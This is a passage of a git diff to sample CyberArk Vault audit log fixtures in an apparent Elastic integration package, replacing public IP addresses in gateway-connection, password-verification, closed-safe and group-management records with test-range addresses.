Root\\2\\\n 10.0.1.20\n \n \n \n \n \n Add Folder\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:01:14","IsoTimestamp":"2021-03-11T18:01:14Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"187","Desc":"Add Folder","Severity":"Info","Issuer":"PVWAAppUser","Action":"Add Folder","SourceUser":"","TargetUser":"","Safe":"PSMUnmanagedSessionAccounts","File":"Root\\2\\","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Folder","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/19_full_gateway_connection.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/19_full_gateway_connection.log index 88926eb1571..2794595cff7 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/19_full_gateway_connection.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/19_full_gateway_connection.log @@ -1,9 +1,9 @@ <5>1 2021-03-08T18:07:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:07:51","IsoTimestamp":"2021-03-08T18:07:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-09T08:32:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 00:32:51","IsoTimestamp":"2021-03-09T08:32:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-09T10:14:58Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 02:14:58","IsoTimestamp":"2021-03-09T10:14:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"37.223.7.45","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-09T08:32:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 00:32:51","IsoTimestamp":"2021-03-09T08:32:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-09T10:14:58Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 02:14:58","IsoTimestamp":"2021-03-09T10:14:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} <5>1 2021-03-10T08:31:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:31:50","IsoTimestamp":"2021-03-10T08:31:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"PasswordManager","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} <5>1 2021-03-10T22:37:00Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:37:00","IsoTimestamp":"2021-03-10T22:37:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"10.0.1.10","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-11T17:38:05Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:05\n 2021-03-11T17:38:05Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_VAGRANT\n \n \n \n 127.0.0.1\n \n \n \n \n \n Full Gateway Connection\n 81.32.170.205\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:05","IsoTimestamp":"2021-03-11T17:38:05Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"81.32.170.205"}}} -<5>1 2021-03-11T17:48:22Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:22\n 2021-03-11T17:48:22Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_VAGRANT\n \n \n \n 10.0.2.2\n \n \n \n \n \n Full Gateway Connection\n 81.32.170.205\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:22","IsoTimestamp":"2021-03-11T17:48:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"81.32.170.205"}}} -<5>1 2021-03-11T18:02:57Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:02:57\n 2021-03-11T18:02:57Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PVWAGWUser\n \n \n \n 35.192.121.42\n \n \n \n \n \n Full Gateway Connection\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:02:57","IsoTimestamp":"2021-03-11T18:02:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-14T13:49:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:35\n 2021-03-14T13:49:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_SSH\n \n \n \n 81.32.170.205\n \n \n \n \n \n Full Gateway Connection\n 34.71.250.247\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:35","IsoTimestamp":"2021-03-14T13:49:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_SSH","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"34.71.250.247"}}} +<5>1 2021-03-11T17:38:05Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:05\n 2021-03-11T17:38:05Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_VAGRANT\n \n \n \n 127.0.0.1\n \n \n \n \n \n Full Gateway Connection\n 67.43.156.13\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:05","IsoTimestamp":"2021-03-11T17:38:05Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"67.43.156.13"}}} +<5>1 2021-03-11T17:48:22Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:22\n 2021-03-11T17:48:22Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_VAGRANT\n \n \n \n 10.0.2.2\n \n \n \n \n \n Full Gateway Connection\n 67.43.156.13\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:22","IsoTimestamp":"2021-03-11T17:48:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"67.43.156.13"}}} +<5>1 2021-03-11T18:02:57Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:02:57\n 2021-03-11T18:02:57Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PVWAGWUser\n \n \n \n 67.43.156.14\n \n \n \n \n \n Full Gateway Connection\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:02:57","IsoTimestamp":"2021-03-11T18:02:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-14T13:49:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:35\n 2021-03-14T13:49:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 19\n Full Gateway Connection\n Info\n Administrator\n Full Gateway Connection\n PSMPGW_SSH\n \n \n \n 67.43.156.13\n \n \n \n \n \n Full Gateway Connection\n 67.43.156.15\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:35","IsoTimestamp":"2021-03-14T13:49:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PSMPGW_SSH","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"67.43.156.15"}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/22_cpm_verify_password.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/22_cpm_verify_password.log index f3949f536de..fe6a126c6cb 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/22_cpm_verify_password.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/22_cpm_verify_password.log @@ -1,2 +1,2 @@ Apr 07 09:51:42 VAULT {"format":"elastic","version":"1.0","raw":"\n \n no\n Cyber-Ark\n Vault\n 11.6.0000\n 22\n CPM Verify Password\n Info\n PasswordManager\n CPM Verify Password\n \n \n Linux\n Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-test12\n 10.2.0.4\n \n \n \n ImmediateTask\n address=radiussrv.cyberark.local;username=test12;\n CPM Verify Password\n \n \n \n \n \n \n \n \n \n \n \n \n \n","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"22","Desc":"CPM Verify Password","Severity":"Info","Issuer":"PasswordManager","Action":"CPM Verify Password","SourceUser":"","TargetUser":"","IsoTimestamp":"2021-03-16T15:01:00Z","Safe":"Linux","File":"Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-test12","Station":"10.2.0.4","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask","ExtraDetails":"address=radiussrv.cyberark.local;username=test12;","Message":"CPM Verify Password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"LINUX-SSH"},{"Name":"UserName","Value":"test12"},{"Name":"Address","Value":"radiussrv.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastSuccessVerification","Value":"1604943844"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"success"},{"Name":"CreationMethod","Value":"PVWA"}]}}}} -<5>1 2021-03-15T10:22:44Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:22:44\n 2021-03-15T10:22:44Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 22\n CPM Verify Password\n Info\n PasswordManager\n CPM Verify Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 10.0.1.20\n \n \n \n ImmediateTask\n address=34.123.103.115;username=testark;\n CPM Verify Password\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:22:44","IsoTimestamp":"2021-03-15T10:22:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"22","Desc":"CPM Verify Password","Severity":"Info","Issuer":"PasswordManager","Action":"CPM Verify Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask","ExtraDetails":"address=34.123.103.115;username=testark;","Message":"CPM Verify Password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:22:44Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:22:44\n 2021-03-15T10:22:44Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 22\n CPM Verify Password\n Info\n PasswordManager\n CPM Verify Password\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 10.0.1.20\n \n \n \n ImmediateTask\n address=67.43.156.15;username=testark;\n CPM Verify Password\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:22:44","IsoTimestamp":"2021-03-15T10:22:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"22","Desc":"CPM Verify Password","Severity":"Info","Issuer":"PasswordManager","Action":"CPM Verify Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask","ExtraDetails":"address=67.43.156.15;username=testark;","Message":"CPM Verify Password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/23_action_on_closed_safe.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/23_action_on_closed_safe.log index 51629665b2b..b4953ee2439 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/23_action_on_closed_safe.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/23_action_on_closed_safe.log @@ -1,3 +1,3 @@ -<7>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"Administrator","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}} +<7>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"Administrator","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}} <7>1 2021-03-14T12:07:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:07:27\n 2021-03-14T12:07:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 23\n Action On Closed Safe\n Error\n PasswordManager\n Action On Closed Safe\n \n \n AccountsFeedADAccounts\n \n 10.0.1.20\n \n \n \n \n \n Action On Closed Safe\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:07:27","IsoTimestamp":"2021-03-14T12:07:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"PasswordManager","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"AccountsFeedADAccounts","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}} -<7>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 23\n Action On Closed Safe\n Error\n Administrator\n Action On Closed Safe\n \n \n PSMPConf\n \n 34.71.250.247\n \n \n \n \n \n Action On Closed Safe\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"Administrator","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}} +<7>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 23\n Action On Closed Safe\n Error\n Administrator\n Action On Closed Safe\n \n \n PSMPConf\n \n 67.43.156.15\n \n \n \n \n \n Action On Closed Safe\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"Administrator","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/259_add_update_group.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/259_add_update_group.log index 7284820d8e4..efc7388178f 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/259_add_update_group.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/259_add_update_group.log @@ -1,4 +1,4 @@ -<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMMaster","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} -<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} -<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} -<5>1 2021-03-10T17:59:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:29","IsoTimestamp":"2021-03-10T17:59:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMLiveSessionTerminators","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} +<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMMaster","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} +<5>1 2021-03-10T09:11:21Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:21","IsoTimestamp":"2021-03-10T09:11:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} +<5>1 2021-03-10T09:11:35Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:35","IsoTimestamp":"2021-03-10T09:11:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} +<5>1 2021-03-10T17:59:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:29","IsoTimestamp":"2021-03-10T17:59:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"259","Desc":"Add/Update Group","Severity":"Info","Issuer":"Administrator","Action":"Add/Update Group","SourceUser":"PSMLiveSessionTerminators","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add/Update Group","GatewayStation":""}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/265_add_group_member.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/265_add_group_member.log index bff61c277da..709d22f77a2 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/265_add_group_member.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/265_add_group_member.log @@ -1,14 +1,14 @@ -<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"265","Desc":"Add Group Member","Severity":"Info","Issuer":"Administrator","Action":"Add Group Member","SourceUser":"PSMAppUsers","TargetUser":"PSMPApp_localhost.localdomain","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Group Member","GatewayStation":""}}} -<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 